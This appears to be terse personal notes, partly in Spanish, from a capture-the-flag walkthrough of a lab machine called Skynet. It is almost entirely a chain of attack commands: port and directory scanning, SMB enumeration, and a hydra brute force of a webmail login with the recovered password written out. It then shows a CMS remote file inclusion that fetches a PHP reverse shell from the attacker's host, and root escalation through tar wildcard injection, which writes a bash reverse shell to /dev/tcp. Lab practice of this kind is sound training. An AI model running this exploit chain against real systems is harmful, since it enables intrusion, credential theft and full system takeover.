nmap -A -p- -oA output 10.10.78.162 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA skynet 10.10.78.162
nmap -sU -O -p- -oA skynet-udp 10.10.78.162
nikto -h 10.10.78.162:80
gobuster dir -u http://10.10.78.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -t 40 -o scans/gobuster-root-
med
smbclient -L 10.10.78.162
smbclient //10.10.78.162/anonymous
hydra -l milesdyson -P log1.txt 10.10.78.162 http-post-form "/squirrelmail/src/redirect.php:login\_username=^USER^&secretkey=^PASS^&js\_autodetect\_results=1&just\_logged\_in=1:Unknown user or password incorrect." -v
milesdyson/)s{A&2Z=F^n_E.B`
smbclient -U milesdyson //10.10.78.162/milesdyson smb: \> ls smb: \> cd notes smb: \notes\> ls smb: \notes\> get important.txt cat important.txt
curl -s http://10.10.78.162/45kra24zxs28v3yd/
Vemos que este directorio tiene un cms
Existe un exploit para este cms https://www.exploit-db.com/exploits/25971
curl -s http://10.10.78.162/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
rlwrap nc -lvnp 5555 locate php-reverse-shell vim php-reverse-shell
Cambiamos la ip y el puerto
![[Pasted image 20210507084228.png]]
python3 -m http.server 8888
http://10.10.78.162/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.72.57:8888/php-reverse-shell.php
python -c 'import pty; pty.spawn("/bin/bash")' cd /home/milesdyson ls -la cat /etc/crontab
Podemos ver que se corre un cron que comprime todo encontrado en /var/www/html y lo pone en backup.sh
GTFOBins https://gtfobins.github.io/gtfobins/tar/
$ printf '#!/bin/bash\nbash -i >& /dev/tcp/10.6.72.57/7777 0>&1' > /var/www/html/shell $ chmod +x /var/www/html/shell $ touch /var/www/html/--checkpoint=1 $ touch /var/www/html/--checkpoint-action=exec=bash\ shell $ ls -l /var/www/html
nc -lvnp 7777